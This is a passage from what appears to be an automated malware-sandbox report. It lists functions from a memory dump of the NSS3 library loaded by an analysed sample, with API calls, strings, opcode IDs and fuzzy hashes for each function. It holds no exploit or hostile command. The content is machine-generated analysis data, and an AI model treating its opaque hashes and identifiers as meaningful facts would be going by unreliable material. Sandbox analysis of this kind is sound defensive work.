                                                                        • Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                        • Instruction Fuzzy Hash: F5113B79A14680AFE7205EA5FC4179FB2E4EB11208F504134E48A8BB20F632F41AC652
                                                                        Function 6CB6FDF0 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CB6FE08
                                                                          • Part of subcall function 6CB710C0: TlsGetValue.KERNEL32(?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB710F3
                                                                          • Part of subcall function 6CB710C0: EnterCriticalSection.KERNEL32(?,?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB7110C
                                                                          • Part of subcall function 6CB710C0: PL_ArenaAllocate.NSS3(?,?,?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB71141
                                                                          • Part of subcall function 6CB710C0: PR_Unlock.NSS3(?,?,?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB71182
                                                                          • Part of subcall function 6CB710C0: TlsGetValue.KERNEL32(?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB7119C
                                                                        • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CB6FE1D
                                                                          • Part of subcall function 6CB710C0: PL_ArenaAllocate.NSS3(?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB7116E
                                                                        • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CB6FE29
                                                                        • PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CB6FE3D
                                                                        • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CB6FE62
                                                                        • free.MOZGLUE(00000000,?,?,?,?), ref: 6CB6FE6F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
                                                                        • String ID:
                                                                        • API String ID: 660648399-0
                                                                        • Opcode ID: 1a73cc2bd70079968c46ba0de89563900ff2d2ece4669a0c85292f461f5aeb44
                                                                        • Instruction ID: 784d07c5477ac20e8ae8f74db2a6d0b5c7d35058a5675c5dd86dfcbc4981b5b3
                                                                        • Opcode Fuzzy Hash: 1a73cc2bd70079968c46ba0de89563900ff2d2ece4669a0c85292f461f5aeb44
                                                                        • Instruction Fuzzy Hash: 35110CB66002816BEF104F56DC40B5B7798EF54299F148034ED1C97F52E731D914C7A2
                                                                        Function 6CC1FD90 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_Lock.NSS3 ref: 6CC1FD9E
                                                                          • Part of subcall function 6CBD9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CB01A48), ref: 6CBD9BB3
                                                                          • Part of subcall function 6CBD9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CB01A48), ref: 6CBD9BC8
                                                                        • PR_WaitCondVar.NSS3(000000FF), ref: 6CC1FDB9
                                                                          • Part of subcall function 6CAFA900: TlsGetValue.KERNEL32(00000000,?,6CC714E4,?,6CA94DD9), ref: 6CAFA90F
                                                                          • Part of subcall function 6CAFA900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6CAFA94F
                                                                        • PR_Unlock.NSS3 ref: 6CC1FDD4
                                                                        • PR_Lock.NSS3 ref: 6CC1FDF2
                                                                        • PR_NotifyAllCondVar.NSS3 ref: 6CC1FE0D
                                                                        • PR_Unlock.NSS3 ref: 6CC1FE23
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
                                                                        • String ID:
                                                                        • API String ID: 3365241057-0
                                                                        • Opcode ID: 6921e84e8ed09652c35a0216b9bb6a944a485d9a0cbd05064c15df88564699c0
                                                                        • Instruction ID: 2b29f4e4955c21ab67de862f5f755600fe1b3baa33008105ddc71a8838621bdd
                                                                        • Opcode Fuzzy Hash: 6921e84e8ed09652c35a0216b9bb6a944a485d9a0cbd05064c15df88564699c0
                                                                        • Instruction Fuzzy Hash: B501E1F6A242509FCF155E6AFC218557631FB022287154374E92A47FE1FB22ED38C6C1
                                                                        Function 6CB5FC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6CB5FC55
                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CB5FCB2
                                                                        • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CB5FDB7
                                                                        • PR_SetError.NSS3(FFFFE09A,00000000), ref: 6CB5FDDE
                                                                          • Part of subcall function 6CB68800: TlsGetValue.KERNEL32(?,6CB7085A,00000000,?,6CB18369,?), ref: 6CB68821
                                                                          • Part of subcall function 6CB68800: TlsGetValue.KERNEL32(?,?,6CB7085A,00000000,?,6CB18369,?), ref: 6CB6883D
                                                                          • Part of subcall function 6CB68800: EnterCriticalSection.KERNEL32(?,?,?,6CB7085A,00000000,?,6CB18369,?), ref: 6CB68856
                                                                          • Part of subcall function 6CB68800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6CB68887
                                                                          • Part of subcall function 6CB68800: PR_Unlock.NSS3(?,?,?,?,6CB7085A,00000000,?,6CB18369,?), ref: 6CB68899
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
                                                                        • String ID: pkcs11:
                                                                        • API String ID: 362709927-2446828420
                                                                        • Opcode ID: 027a6dd4790506fc5400d3e35070f8e3aa182bfda97ce5bb66bdcf4194a524dc
                                                                        • Instruction ID: fa1606e03fda9cd1a5e184f48019f71977412c86df79dfa5db5342fd08f9e9d4
                                                                        • Opcode Fuzzy Hash: 027a6dd4790506fc5400d3e35070f8e3aa182bfda97ce5bb66bdcf4194a524dc
                                                                        • Instruction Fuzzy Hash: D351C0B2A001E19BEB018F69DC44F9EB375EB41359F950025DD05ABF91EB31E924CBA2
                                                                        Function 6CA9BDA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memcmp.VCRUNTIME140(00000000,?,?), ref: 6CA9BE02
                                                                          • Part of subcall function 6CBC9C40: memcmp.VCRUNTIME140(?,00000000,6CA9C52B), ref: 6CBC9D53
                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA9BE9F
                                                                        Strings
                                                                        • %s at line %d of [%.10s], xrefs: 6CA9BE98
                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA9BE89
                                                                        • database corruption, xrefs: 6CA9BE93
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: memcmp$sqlite3_log
                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                        • API String ID: 1135338897-598938438
                                                                        • Opcode ID: 0fddcb7ef8c6959c6ea1150369145a98b299984335eabf27b03cb162be60fad6
                                                                        • Instruction ID: c2cef72dae4280e7d1fb9d502b7f3bb2bb44d79d5f69199e3ee5457b256c7204
                                                                        • Opcode Fuzzy Hash: 0fddcb7ef8c6959c6ea1150369145a98b299984335eabf27b03cb162be60fad6
                                                                        • Instruction Fuzzy Hash: 50315931B142558BC720CF29E8D5AABBBFAAF41314B1C8654EE441BB41D370EC84C3D0
                                                                        Function 6CB00DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6CB00BDE), ref: 6CB00DCB
                                                                        • strrchr.VCRUNTIME140(00000000,0000005C,?,6CB00BDE), ref: 6CB00DEA
                                                                        • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6CB00BDE), ref: 6CB00DFC
                                                                        • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6CB00BDE), ref: 6CB00E32
                                                                        Strings
                                                                        • %s incr => %d (find lib), xrefs: 6CB00E2D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: strrchr$Print_stricmp
                                                                        • String ID: %s incr => %d (find lib)
                                                                        • API String ID: 97259331-2309350800
                                                                        • Opcode ID: baad2de1a1fea18eafca7aa1970d6339d8e330f15492d8863b7c1fff49dd956a
                                                                        • Instruction ID: df77f92cd514955ba2f97861e7188faf0251cbd19ab32b3fc59cb6b130a9343a
                                                                        • Opcode Fuzzy Hash: baad2de1a1fea18eafca7aa1970d6339d8e330f15492d8863b7c1fff49dd956a
                                                                        • Instruction Fuzzy Hash: 6A012472B002609FE720AF25AC45E1777BCDB45A09B04483EE909E3A41F761FC14C6E1
                                                                        Function 6CAA9C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6CAA9CF2
                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6CAA9D45
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6CAA9D8B
                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6CAA9DDE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$EnterLeave
                                                                        • String ID:
                                                                        • API String ID: 3168844106-0
                                                                        • Opcode ID: 0230197552c0c1412456aed1f19c206ab30ea762c26a50f626cd7293a1d026e4
                                                                        • Instruction ID: 6f388793d3b4d1f217585c6bd125e893856922d72fe178d594908691e8f7a8ca
                                                                        • Opcode Fuzzy Hash: 0230197552c0c1412456aed1f19c206ab30ea762c26a50f626cd7293a1d026e4
                                                                        • Instruction Fuzzy Hash: 60A1AE31704210DFEB09DFB6DA9967E3775FB86315F18002ED4064BA50DB3A9887DB92
                                                                        Function 6CBBDD70 Relevance: 7.7, APIs: 5, Instructions: 179COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32 ref: 6CBBDD8C
                                                                        • LeaveCriticalSection.KERNEL32(00000000), ref: 6CBBDDB4
                                                                        • LeaveCriticalSection.KERNEL32(00000000), ref: 6CBBDE1B
                                                                        • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6CBBDE77
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalLeaveSection$ReleaseSemaphoreValue
                                                                        • String ID:
                                                                        • API String ID: 2700453212-0
                                                                        • Opcode ID: aa2789153e8ecdb14aaa34c42c4986c6576650237c1093f9fbdc6254778c01b4
                                                                        • Instruction ID: 8e181fb3e6ee7364631099acfc6a465c33166cdcc1b17ae3149b6d62196bebe9
                                                                        • Opcode Fuzzy Hash: aa2789153e8ecdb14aaa34c42c4986c6576650237c1093f9fbdc6254778c01b4
                                                                        • Instruction Fuzzy Hash: 49716471A04318CFDF10CFAAD5806A9B7B4FF89718F25816DD8596B70ADB34A902CF91
                                                                        Function 6CB0EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32 ref: 6CB0EDFD
                                                                        • calloc.MOZGLUE(00000001,00000000), ref: 6CB0EE64
                                                                        • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6CB0EECC
                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB0EEEB
                                                                        • free.MOZGLUE(?), ref: 6CB0EEF6
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorValuecallocfreememcpy
                                                                        • String ID:
                                                                        • API String ID: 3833505462-0
                                                                        • Opcode ID: d57350933554cff5f6bdf1d6733a77431eb488ce33dec340d9e5c48ebb375366
                                                                        • Instruction ID: 738f357883cc87d4357c83de4583a48017c24a311d65756a9676b1514dc8c1e5
                                                                        • Opcode Fuzzy Hash: d57350933554cff5f6bdf1d6733a77431eb488ce33dec340d9e5c48ebb375366
                                                                        • Instruction Fuzzy Hash: A2310771B002D49BEB219F29CC4476A7FF4FB46305F140628E89A87A51DB31E455CBE2
                                                                        Function 6CB11DD0 Relevance: 7.6, APIs: 5, Instructions: 81timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CB11E0B
                                                                        • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CB11E24
                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB11E3B
                                                                        • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CB11E8A
                                                                        • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CB11EAD
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Error$Choice_DecodeTimeUtil
                                                                        • String ID:
                                                                        • API String ID: 1529734605-0
                                                                        • Opcode ID: c189531f54cd99b4a3787e815e68a59c44d3197b82e57d1630caee1f2d14a7bf
                                                                        • Instruction ID: 81ca121af197aecef654266d7e0c8f4b9a057db5ab1c12eb07d9800da6874969
                                                                        • Opcode Fuzzy Hash: c189531f54cd99b4a3787e815e68a59c44d3197b82e57d1630caee1f2d14a7bf
                                                                        • Instruction Fuzzy Hash: 5121C173E08655A7D7008EA8DC40B9E73A4DB95368F184638ED6D67B84E730DA09C7E2
                                                                        Function 6CB1AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PORT_ArenaMark_Util.NSS3(00000000,?,6CB13FFF,00000000,?,?,?,?,?,6CB11A1C,00000000,00000000), ref: 6CB1ADA7
                                                                          • Part of subcall function 6CB714C0: TlsGetValue.KERNEL32 ref: 6CB714E0
                                                                          • Part of subcall function 6CB714C0: EnterCriticalSection.KERNEL32 ref: 6CB714F5
                                                                          • Part of subcall function 6CB714C0: PR_Unlock.NSS3 ref: 6CB7150D
                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6CB13FFF,00000000,?,?,?,?,?,6CB11A1C,00000000,00000000), ref: 6CB1ADB4
                                                                          • Part of subcall function 6CB710C0: TlsGetValue.KERNEL32(?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB710F3
                                                                          • Part of subcall function 6CB710C0: EnterCriticalSection.KERNEL32(?,?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB7110C
                                                                          • Part of subcall function 6CB710C0: PL_ArenaAllocate.NSS3(?,?,?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB71141
                                                                          • Part of subcall function 6CB710C0: PR_Unlock.NSS3(?,?,?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB71182
                                                                          • Part of subcall function 6CB710C0: TlsGetValue.KERNEL32(?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB7119C
                                                                        • SECITEM_CopyItem_Util.NSS3(00000000,?,6CB13FFF,?,?,?,?,6CB13FFF,00000000,?,?,?,?,?,6CB11A1C,00000000), ref: 6CB1ADD5
                                                                          • Part of subcall function 6CB6FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CB68D2D,?,00000000,?), ref: 6CB6FB85
                                                                          • Part of subcall function 6CB6FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CB6FBB1
                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CC394B0,?,?,?,?,?,?,?,?,6CB13FFF,00000000,?), ref: 6CB1ADEC
                                                                          • Part of subcall function 6CB6B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CC418D0,?), ref: 6CB6B095
                                                                        • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CB13FFF), ref: 6CB1AE3C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                        • String ID:
                                                                        • API String ID: 2372449006-0
                                                                        • Opcode ID: 3df9dca0e3c51b09932daac4b8925a887b74cdc2f49fbfbe8cc4a948bfb2138c
                                                                        • Instruction ID: 190f1a9916a6c5a1a3569d731f9ac90a4e0782d3d2a2d3c15388f5e12bf418d9
                                                                        • Opcode Fuzzy Hash: 3df9dca0e3c51b09932daac4b8925a887b74cdc2f49fbfbe8cc4a948bfb2138c
                                                                        • Instruction Fuzzy Hash: 26115632E042946BE7109B659C01BBF73B8DF9124CF044229EC5996A41FB20F95D87A3
                                                                        Function 6CB3CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 6CB51E10: TlsGetValue.KERNEL32 ref: 6CB51E36
                                                                          • Part of subcall function 6CB51E10: EnterCriticalSection.KERNEL32(?,?,?,6CB2B1EE,2404110F,?,?), ref: 6CB51E4B
                                                                          • Part of subcall function 6CB51E10: PR_Unlock.NSS3 ref: 6CB51E76
                                                                        • free.MOZGLUE(?,6CB3D079,00000000,00000001), ref: 6CB3CDA5
                                                                        • PK11_FreeSymKey.NSS3(?,6CB3D079,00000000,00000001), ref: 6CB3CDB6
                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6CB3D079,00000000,00000001), ref: 6CB3CDCF
                                                                        • DeleteCriticalSection.KERNEL32(?,6CB3D079,00000000,00000001), ref: 6CB3CDE2
                                                                        • free.MOZGLUE(?), ref: 6CB3CDE9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                        • String ID:
                                                                        • API String ID: 1720798025-0
                                                                        • Opcode ID: 5a32c430093e16befc518fd8dc1f5b37aaccf405c02d79e8bcb60379a3ab42f6
                                                                        • Instruction ID: 0e9f0053fbe68878fd5f0a925938168ae391b5bd1ad5f41787c8c92ee90a4b1b
                                                                        • Opcode Fuzzy Hash: 5a32c430093e16befc518fd8dc1f5b37aaccf405c02d79e8bcb60379a3ab42f6
                                                                        • Instruction Fuzzy Hash: 9611A3B2B01171ABDE01AEA6ED44996B73CFF042597140221F90D87E01E732F474C7E2
                                                                        Function 6CB73D90 Relevance: 7.6, APIs: 5, Instructions: 57memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
